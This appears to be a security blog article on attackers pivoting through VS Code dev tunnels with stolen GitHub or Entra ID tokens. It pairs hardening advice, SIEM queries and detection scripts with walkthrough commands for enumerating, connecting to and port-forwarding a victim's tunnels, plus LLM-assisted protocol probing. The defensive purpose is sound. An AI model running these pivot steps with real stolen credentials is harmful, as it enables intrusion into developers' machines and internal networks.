Hackers’ New Playground: Exploiting VSCode Dev Tunnels for Cross-Cloud Pivoting – A Deep Dive + Video


Introduction:

Visual Studio Code dev tunnels give developers instant remote access to a local development environment without VPNs or firewall rules. That convenience also creates a blind spot: the tunnel is reachable from anywhere on the internet, and the only thing between an attacker and the developer's machine is an identity check. Anyone holding that developer's GitHub or Entra ID credentials can enumerate the tunnels the identity owns and pivot through them, bypassing the network perimeter entirely. This article dissects the dev-tunnels architecture, walks through the enumeration and pivot steps, and offers hardening and detection guidance based on Adam Chester's (xpn) research.

Learning Objectives:

  • Understand the authentication and session management architecture of VSCode dev tunnels.
  • Learn how to enumerate active tunnels from compromised GitHub or Entra ID tokens using CLI tools.
  • Implement detection rules and configuration hardening to prevent unauthorized tunnel access.

You Should Know:

  1. Anatomy of VSCode Dev Tunnels – From Creation to Abuse
    VS Code's Remote Tunnels feature (the `code tunnel` command, or "Turn on Remote Tunnel Access" inside the editor) is built on Microsoft's Dev Tunnels service. Hosting a tunnel registers the machine with the service under a chosen name; the service then exposes each forwarded port through an HTTPS endpoint of the form https://<tunnel-id>-<port>.<region>.devtunnels.ms that relays traffic to the developer's machine, and VS Code clients reach the editor itself through https://vscode.dev/tunnel/<machine-name>. Authentication is a GitHub account or a Microsoft/Entra ID account, and only the identity that created a tunnel may connect to it, so access control is an identity check, not a network one. Tunnels installed as a service (`code tunnel service install`) survive reboots and keep running after the developer has logged out. The consequence: an attacker who obtains a usable credential for that identity (a GitHub token, an Entra ID access or refresh token, or a session cookie that can be turned into one) can list, connect to, and forward traffic through every tunnel the identity owns, with no second factor and no exploit.

Step‑by‑step guide to inspect your own tunnels (defensive):

  • Linux/macOS:
    Install the VS Code CLI if not present, then confirm it is on the path
    code --version

    Show which account this machine's tunnel is registered under, and whether one is running
    code tunnel user show
    code tunnel status

    VS Code tunnels are Dev Tunnels under the hood, so Microsoft's devtunnel CLI lists every tunnel the same identity owns, including ones hosted from other machines
    devtunnel user login -g        # -g for a GitHub account; -a for an Entra ID / Microsoft account
    devtunnel list
    Example output (constructed; the real listing shows tunnel ID, name, region/cluster and port count):
    6r5zm1fk    staging-api    usw2    2 ports

    Inspect one tunnel, including its access-control entries and forwarded ports
    devtunnel show <tunnel-id>
    devtunnel port list <tunnel-id>

    Remove a tunnel you do not recognise
    devtunnel delete <tunnel-id>

  • Windows (PowerShell):

    Using the VS Code CLI
    & "C:\Program Files\Microsoft VS Code\bin\code.cmd" tunnel status
    & "C:\Program Files\Microsoft VS Code\bin\code.cmd" tunnel user show

    Using the devtunnel CLI
    devtunnel user show
    devtunnel list

    Alternatively, query the Dev Tunnels management API directly with the GitHub token the gh CLI already holds. The management host is the one the devtunnel CLI talks to; the api-version value below is an assumption, so check it against the CLI's own requests (mitmproxy) if the call is rejected. Note the scheme is "github", not "Bearer": the scheme tells the service which provider issued the token.
    $token = gh auth token
    Invoke-RestMethod -Uri "https://global.rel.tunnels.api.visualstudio.com/tunnels?api-version=2023-09-27-preview" -Headers @{Authorization="github $token"}

2. Enumerating Active Tunnels via GitHub API (Post-Compromise)

Once an attacker holds a GitHub personal access token (PAT) or OAuth session token, they can present it to the Dev Tunnels service as proof of identity. The key insight: VS Code tunnels are tied to the user's GitHub identity, the tunnel service accepts a GitHub token for that identity, and no separate MFA step is required to list or connect to the user's tunnels. Which token types the service accepts (classic PAT, fine-grained PAT, OAuth token issued to its own GitHub app) is worth confirming in your own lab before relying on it.

Step‑by‑step attack simulation (authorized environment only):

  • Confirm the token works and identify its owner:
    curl -s -H "Authorization: token YOUR_COMPROMISED_PAT" https://api.github.com/user | jq '{login, id}'

  • Present the same token to the Dev Tunnels management API (scheme "github", not "Bearer"; the api-version is an assumption, verify it against what the devtunnel CLI sends):
    curl -s "https://global.rel.tunnels.api.visualstudio.com/tunnels?api-version=2023-09-27-preview" \
      -H "Authorization: github YOUR_COMPROMISED_PAT" | jq .

  • On Windows with PowerShell and the gh CLI (gh api only talks to GitHub's own API, so the tunnel call still goes through Invoke-RestMethod):
    gh auth status
    gh api user --jq '.login'
    $token = gh auth token
    Invoke-RestMethod -Uri "https://global.rel.tunnels.api.visualstudio.com/tunnels?api-version=2023-09-27-preview" -Headers @{Authorization="github $token"}
    
  3. Pivoting from Entra ID Access to Dev-Tunnel Servers
    Organizations that sign in to VS Code with a Microsoft account backed by Entra ID expose an even larger attack surface, because Entra ID tokens are obtainable in far more ways than a GitHub PAT: a stolen session cookie replayed to mint tokens, a compromised device's token cache, a phished device-code flow. With an Entra ID token scoped to the Dev Tunnels service, an attacker can connect to any tunnel owned by that identity, which typically means internal development servers, staging databases, or CI/CD runners that were never meant to be reachable from the internet.

Step‑by‑step pivot using the Azure and devtunnel CLIs:

  • Authenticate as the compromised identity. Either log the devtunnel CLI in directly (it runs the Entra ID flow itself; `devtunnel user login --help` lists the device-code option):
    devtunnel user login -a
    Or sign in with the Azure CLI, which works even when the account holds no subscriptions:
    az login --allow-no-subscriptions --tenant <tenant-id> --use-device-code

  • From the Azure CLI session, mint a token for the Dev Tunnels service and call the management API. The resource is the Dev Tunnels service application ID as it appears in the tenant's enterprise applications and sign-in logs; a token for https://management.azure.com has the wrong audience and is rejected. The api-version is an assumption to verify against the devtunnel CLI's traffic:
    ACCESS_TOKEN=$(az account get-access-token --resource <dev-tunnels-service-app-id> --query accessToken -o tsv)
    curl -s -H "Authorization: aad $ACCESS_TOKEN" "https://global.rel.tunnels.api.visualstudio.com/tunnels?api-version=2023-09-27-preview"

  • Find out what a discovered tunnel exposes:
    devtunnel show <tunnel-id>
    devtunnel port list <tunnel-id>

  • Reach it. Each forwarded port has a public HTTPS endpoint (the exact host is in the `devtunnel show` output). A browser is redirected to sign in; for scripted access, mint a tunnel access token and pass it in the tunnel authorization header:
    TUNNEL_TOKEN=$(devtunnel token <tunnel-id> --scopes connect)
    curl -s -H "X-Tunnel-Authorization: tunnel $TUNNEL_TOKEN" https://<tunnel-id>-<port>.<region>.devtunnels.ms/
    A VS Code tunnel can also be opened as https://vscode.dev/tunnel/<machine-name>, which gives a full editor and terminal on the developer's machine.

  • Or bring the tunnel's ports to localhost and use it as a local port forward:
    devtunnel connect <tunnel-id>
    The CLI forwards each of the tunnel's ports to the same port number on 127.0.0.1; point internal tooling at localhost:<port>.
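Sections 1 to 3 above describe three things a script has to get right: which Authorization scheme goes with which credential, how a tunnel record maps to public endpoints, and how to pull the tunnel ID, port and region back out of an endpoint URL. The following Python is an added example written for this page; it is not the original post's code nor Adam Chester's tooling. It assumes the management host and the "github"/"aad"/"tunnel" header schemes used by the open-source dev-tunnels SDK, an api-version value that should be checked against the devtunnel CLI's own requests, and a tunnel record shape that mirrors the SDK's Tunnel object; the sample record is constructed. Only `list_tunnels()` touches the network, and it runs only when a credential is supplied.

```python
"""Added example: helpers for the Dev Tunnels management API.
Assumptions (not from the original post): API host, header schemes and record
shape mirror the open-source dev-tunnels SDK; API_VERSION is a guess to verify
against the devtunnel CLI's traffic; SAMPLE_TUNNEL is a constructed record."""
import json
import os
import re
import urllib.request
from typing import List, Optional
from urllib.parse import urlparse

API_HOST = "global.rel.tunnels.api.visualstudio.com"
API_VERSION = "2023-09-27-preview"  # assumption, see module docstring

# Credential kind -> Authorization scheme. The scheme, not "Bearer", tells the
# service which identity provider to validate the token against.
SCHEMES = {"github": "github", "entra": "aad", "tunnel": "tunnel"}

# Endpoint hosts look like <tunnel-id>-<port>.<region>.devtunnels.ms
_HOST_LABEL = re.compile(r"^(?P<tunnel_id>[a-z0-9-]+?)-(?P<port>\d{1,5})$")


def auth_header(kind: str, secret: str) -> dict:
    """Authorization header for a GitHub token, an Entra ID token or a tunnel access token."""
    if kind not in SCHEMES:
        raise ValueError(f"unknown credential kind {kind!r}; expected one of {sorted(SCHEMES)}")
    if not secret or any(c.isspace() for c in secret):
        raise ValueError("credential must be a single non-empty token")
    return {"Authorization": f"{SCHEMES[kind]} {secret}"}


def parse_tunnel_endpoint(url: str) -> Optional[dict]:
    """Recover tunnel id, forwarded port and region from an endpoint URL.
    Returns None for anything that is not an https dev tunnel endpoint."""
    p = urlparse(url)
    if p.scheme != "https" or not p.hostname:
        return None
    labels = p.hostname.lower().split(".")
    if len(labels) != 4 or labels[2:] != ["devtunnels", "ms"]:
        return None
    m = _HOST_LABEL.match(labels[0])
    if not m or not 1 <= int(m.group("port")) <= 65535:
        return None
    return {"tunnel_id": m.group("tunnel_id"), "port": int(m.group("port")), "region": labels[1]}


def summarise_tunnel(tunnel: dict) -> dict:
    """Reduce a tunnel record to what a pivot or an audit cares about: where it
    lives, which ports it exposes, and whether anonymous clients may connect."""
    ports = sorted(int(p["portNumber"]) for p in tunnel.get("ports", []) if "portNumber" in p)
    entries = tunnel.get("accessControl", {}).get("entries", [])
    anonymous_connect = any(
        e.get("type") == "Anonymous" and not e.get("isDeny", False) and "connect" in e.get("scopes", [])
        for e in entries
    )
    tid, cluster = tunnel.get("tunnelId"), tunnel.get("clusterId")
    return {
        "tunnel_id": tid,
        "name": tunnel.get("name"),
        "region": cluster,
        "ports": ports,
        "endpoints": [f"https://{tid}-{port}.{cluster}.devtunnels.ms/" for port in ports],
        "anonymous_connect": anonymous_connect,
    }


def list_tunnels(kind: str, secret: str, timeout: float = 15.0) -> List[dict]:
    """Live call: every tunnel the credential can see. Only run against identities you own."""
    req = urllib.request.Request(
        f"https://{API_HOST}/tunnels?api-version={API_VERSION}",
        headers={**auth_header(kind, secret), "Accept": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = json.load(resp)
    # The service may wrap the list in an object; accept both shapes (assumption).
    return body.get("value", body) if isinstance(body, dict) else body


# Constructed sample record, shaped like the SDK's Tunnel object.
SAMPLE_TUNNEL = {
    "tunnelId": "6r5zm1fk",
    "name": "staging-api",
    "clusterId": "usw2",
    "ports": [{"portNumber": 5432, "protocol": "auto"}, {"portNumber": 5000, "protocol": "http"}],
    "accessControl": {"entries": [{"type": "Anonymous", "scopes": ["connect"], "isDeny": False}]},
}

if __name__ == "__main__":
    tunnels = [SAMPLE_TUNNEL]
    secret = os.environ.get("DEVTUNNEL_TOKEN")  # set this to inspect your own account instead
    if secret:
        tunnels = list_tunnels(os.environ.get("DEVTUNNEL_KIND", "github"), secret)
    for t in tunnels:
        print(json.dumps(summarise_tunnel(t), indent=2))
```

Run it without `DEVTUNNEL_TOKEN` to see the summary of the constructed record; with the variable set (and `DEVTUNNEL_KIND` set to `entra` for an Entra ID token) it lists and summarises the tunnels of your own account. The `anonymous_connect` flag is the single most useful field for an audit: a tunnel that grants the anonymous subject the connect scope needs no stolen credential at all.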

4. Hardening Dev Tunnel Configurations – Mitigations

To prevent unauthorized pivoting, administrators need controls on three layers: whether tunnels may be hosted at all, which identities and devices may authenticate to the tunnel service, and whether tunnel traffic can leave the network unnoticed. None of these is a VS Code settings.json key; there is no user setting that denies tunnel creation, and a user-writable setting would not stop an attacker who already holds the credential anyway.

Step‑by‑step hardening guide:

  • Disable or constrain dev tunnels on managed Windows endpoints with the Dev Tunnels group policy (registry path HKLM\SOFTWARE\Policies\Microsoft\devtunnels; Microsoft's dev tunnels policy documentation lists the value names for disabling tunnels outright, disabling anonymous access and restricting the allowed tunnel domains). Deploy it through your existing GPO or Intune configuration and audit that the key is present:
    Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\devtunnels" -ErrorAction SilentlyContinue

  • Entra ID Conditional Access: treat the Dev Tunnels service as a cloud app and require a compliant or hybrid-joined device, phishing-resistant MFA and a short sign-in frequency for it. Find the service principal with Microsoft Graph PowerShell (the AzureAD module is deprecated); search by display name and confirm the AppId against what your sign-in logs show:
    Connect-MgGraph -Scopes "Application.Read.All"
    Get-MgServicePrincipal -Search '"displayName:tunnel"' -ConsistencyLevel eventual -All | Select-Object DisplayName, AppId

  • GitHub: there is no GitHub-side policy for dev tunnels, because the tunnel service is Microsoft's. Reduce what a stolen GitHub credential buys instead: require expiring fine-grained PATs, enforce SAML SSO on the organization, and revoke the user's tokens and OAuth authorizations as part of incident response.

  • Network: where developers do not need tunnels, block egress to *.devtunnels.ms and the management hosts under *.tunnels.api.visualstudio.com at the proxy or DNS layer, and alert on the first resolution of those names from a subnet that never used them before.

  • Monitor for anomalous tunnel enumeration: alert on sign-ins to the Dev Tunnels cloud app from unusual locations, devices or hours (section 5 gives the query).

5. Detection – Logging and SIEM Queries

Most organizations do not audit dev-tunnel activity. Two sources cover most of it: Entra ID sign-in logs, which record every token issued for the Dev Tunnels service (including non-interactive refreshes), and endpoint process-creation telemetry, which records the tunnel being hosted, installed or connected to. GitHub-authenticated tunnels leave no trace in Entra ID, so the endpoint signal is the only one that covers both identity providers.

Useful Splunk/KQL queries:

  • Azure Monitor (KQL): who is obtaining tokens for the tunnel service, from where, and whether Conditional Access let them through. Match on the app or resource display name rather than a fixed app ID, and pin the exact name down from your own logs first:
    union SigninLogs, AADNonInteractiveUserSignInLogs
    | where AppDisplayName has "tunnel" or ResourceDisplayName has "tunnel"
    | summarize SignIns = count(), IPs = make_set(IPAddress), CAStatus = make_set(ConditionalAccessStatus)
        by UserPrincipalName, AppDisplayName, ResourceDisplayName, bin(TimeGenerated, 1d)
    | where array_length(IPs) > 1 or set_has_element(CAStatus, "failure")

  • Linux audit rule for execution of the VS Code and devtunnel CLIs (the -p x watch fires on exec; the arguments are in the EXECVE record):
    auditctl -w /usr/bin/code -p x -k vscode_tunnel
    auditctl -w /usr/local/bin/devtunnel -p x -k vscode_tunnel
    ausearch -k vscode_tunnel -i | grep -E 'EXECVE.*(tunnel|host|connect)'

  • Windows Sysmon process creation (Event ID 1) for the VS Code tunnel CLI or devtunnel.exe with tunnel-related arguments (the original wildcard 'code.exetunnel' never matches because the image path and the arguments are separated by a space):
    Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} |
      Where-Object { $_.Message -match 'Image:.*(code|code-tunnel|devtunnel)\.exe' -and
                     $_.Message -match 'CommandLine:.*\b(tunnel|host|connect|list)\b' } |
      Select-Object TimeCreated, @{n='CommandLine'; e={ ($_.Message -split "`n" | Where-Object { $_ -like 'CommandLine:*' }) -join '' }}
    
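The Sysmon and auditd queries above only pull raw events; the logic that turns them into ranked findings has to live somewhere. The following Python is an added example written for this page (not from the original post): a small rule table over process-creation events that separates hosting a tunnel, installing it as a service, granting anonymous access, connecting as a client and mere enumeration, and orders the findings by severity. Field names follow Sysmon Event ID 1, the predicates use the `code tunnel` and `devtunnel` subcommands and flags named on this page, and the events at the bottom are constructed; export your own events into the same three fields to run it for real.

```python
"""Added example: rule-based detection of dev tunnel activity in process-creation
events. Not code from the original post. Field names follow Sysmon Event ID 1
(Image, CommandLine, User); SAMPLE_EVENTS is constructed."""
import re
from typing import Iterable, List, Optional

# Executables that create, host or connect to dev tunnels: the VS Code CLI and the devtunnel CLI.
TUNNEL_IMAGE = re.compile(r"(?:^|[\\/])(?:code|code-tunnel|devtunnel)(?:\.exe)?$", re.IGNORECASE)

# Quoted path or bare token. shlex would eat the backslashes in Windows paths.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}

# (rule, severity, predicate over the lower-cased arguments after the executable).
# Most specific first; the first predicate that matches wins.
RULES = [
    ("devtunnel_anonymous_host", "high",
     lambda a: a[:1] == ["host"] and "--allow-anonymous" in a),
    ("devtunnel_anonymous_access_granted", "high",
     lambda a: a[:2] == ["access", "create"] and ("--anonymous" in a or "-a" in a)),
    ("vscode_tunnel_service_install", "high",
     lambda a: a[:3] == ["tunnel", "service", "install"]),
    ("vscode_tunnel_host", "medium",
     lambda a: a[:1] == ["tunnel"]
     and not {"status", "user", "kill", "prune", "unregister", "service", "rename"} & set(a[1:2])),
    ("devtunnel_host", "medium", lambda a: a[:1] == ["host"]),
    ("devtunnel_client_connect", "medium", lambda a: a[:1] == ["connect"]),
    ("tunnel_enumeration", "low",
     lambda a: bool({"list", "show", "status"} & set(a[:3]))),
]


def argv_of(command_line: str) -> List[str]:
    """Split a command line into arguments, keeping quoted paths whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(command_line)]


def classify_event(event: dict) -> Optional[dict]:
    """Return a finding for one process-creation event, or None."""
    argv = argv_of(event.get("CommandLine", ""))
    image = event.get("Image") or (argv[0] if argv else "")
    if not TUNNEL_IMAGE.search(image):
        return None  # the word "tunnel" in an unrelated command line is not a finding
    args = [a.lower() for a in argv[1:]]
    for rule, severity, matches in RULES:
        if matches(args):
            return {"rule": rule, "severity": severity, "user": event.get("User"),
                    "image": image, "args": args}
    return None


def scan(events: Iterable[dict]) -> List[dict]:
    """Findings for a batch of events, highest severity first (input order within a level)."""
    findings = [f for f in map(classify_event, events) if f is not None]
    return sorted(findings, key=lambda f: SEVERITY_RANK[f["severity"]])


# Constructed sample events using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"User": "CORP\\dev1",
     "Image": r"C:\Users\dev1\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe",
     "CommandLine": r'"C:\Users\dev1\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe" tunnel service install --accept-server-license-terms'},
    {"User": "CORP\\dev2", "Image": r"C:\Users\dev2\AppData\Local\Microsoft\WinGet\Links\devtunnel.exe",
     "CommandLine": "devtunnel host -p 8080 --allow-anonymous"},
    {"User": "CORP\\dev2", "Image": r"C:\Users\dev2\AppData\Local\Microsoft\WinGet\Links\devtunnel.exe",
     "CommandLine": "devtunnel list"},
    {"User": "CORP\\dev3", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes\tunnel-plan.txt"},
    {"User": "dev4", "Image": "/usr/bin/code", "CommandLine": "code --version"},
    {"User": "svc_build", "Image": "/usr/local/bin/devtunnel",
     "CommandLine": "devtunnel connect 6r5zm1fk"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['rule']:36} {str(f['user']):12} {' '.join(f['args'])}")
```

The image check comes first on purpose: a developer editing `tunnel-plan.txt` in Notepad must not page anyone. The two high-severity rules are the ones that change the security posture permanently (a tunnel that outlives the session, or one that needs no credential to connect), which is why they outrank a plain interactive `code tunnel`.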
  6. Leveraging LLMs for Protocol Research (Reflections from Adam Chester)
    Using large language models from the start of research accelerates reverse-engineering of undocumented protocols. In this case, ChatGPT-4 and Claude were fed captured dev-tunnels HTTP exchanges and produced message structure definitions and attack-surface hypotheses. The caveat: LLMs still miss nuanced state-machine bugs, and every hypothesis they produce has to be verified against the live service.

Step‑by‑step tutorial for AI-assisted protocol analysis:

1. Capture the CLI's traffic decrypted, not on the wire. tcpdump only yields TLS ciphertext, so run the devtunnel CLI through mitmproxy with the mitmproxy CA trusted by the process:

mitmdump -p 8080 -w tunnels.flow
HTTPS_PROXY=http://127.0.0.1:8080 SSL_CERT_FILE=~/.mitmproxy/mitmproxy-ca-cert.pem devtunnel list

Whether the CLI honours those two environment variables is an assumption; if it does not, use mitmproxy's transparent mode or capture from the VS Code extension host instead.

2. Dump the flows as text and feed them to the LLM with a prompt such as:
“Extract all HTTP endpoints, headers, query parameters and authentication flows from these captured sessions”

mitmdump -nr tunnels.flow --flow-detail 3 > tunnels.txt

3. Ask for potential injection points: “Which fields could be manipulated to reach another user’s tunnel?”
4. Validate every LLM suggestion against the service with small scripts (for example `ffuf` or a few lines of Python), using only identities and tunnels you own. The script below checks which of a set of tunnel IDs the current credential can read; the api-version is an assumption to verify against the CLI's own requests:

import os
import requests

# Credential for the authorized test account. The scheme tells the service which
# provider issued it: "github" for a GitHub token, "aad" for an Entra ID token.
token = os.environ["DEVTUNNEL_TOKEN"]
scheme = os.environ.get("DEVTUNNEL_SCHEME", "github")
headers = {"Authorization": f"{scheme} {token}"}
base = "https://global.rel.tunnels.api.visualstudio.com"

# Tunnel IDs taken from your own `devtunnel list` output, not guessed
for tunnel_id in ["<tunnel-id-1>", "<tunnel-id-2>"]:
    r = requests.get(f"{base}/tunnels/{tunnel_id}?api-version=2023-09-27-preview",
                     headers=headers, timeout=15)
    # 200: readable by this identity; 403/404: not owned by it and not shared with it
    print(r.status_code, tunnel_id)

What Undercode Say:

  • Key Takeaway 1: Dev tunnels are a forgotten attack vector – they bypass network controls, persist after device loss, and are rarely audited.
  • Key Takeaway 2: Identity compromise (GitHub/Entra ID) trumps all network segmentation; securing tokens with device-bound credentials and strict conditional access is non-negotiable.

Analysis: The research highlights a classic trade-off between developer productivity and security. Attackers no longer need RCE on a target; they just need a valid cloud identity. Traditional EDR and firewalls miss outbound tunnel enumeration because it looks like legitimate VSCode traffic. Organizations must adopt zero-trust principles for developer tooling – treat every tunnel as a potential backdoor. Moreover, the integration of LLMs in attack research lowers the barrier for reverse‑engineering proprietary protocols, meaning defenders must assume that any undocumented API will be mapped and abused within days of release.

Prediction:

Within 18 months, we will see targeted ransomware groups pivoting through VSCode dev tunnels as a primary lateral movement technique, bypassing VPNs and ZTNA solutions. Microsoft will be forced to introduce mandatory MFA for every dev-tunnel session and deprecate long-lived PATs. Open-source detection rules (Sigma/YARA) for tunnel abuse will become as common as those for PsExec. Defenders who proactively restrict dev tunnels to short-lived, audited sessions will stay ahead; those who ignore them will face internal-network compromise from a single stolen GitHub cookie.

Reported By: Xpn – Hackers Feeds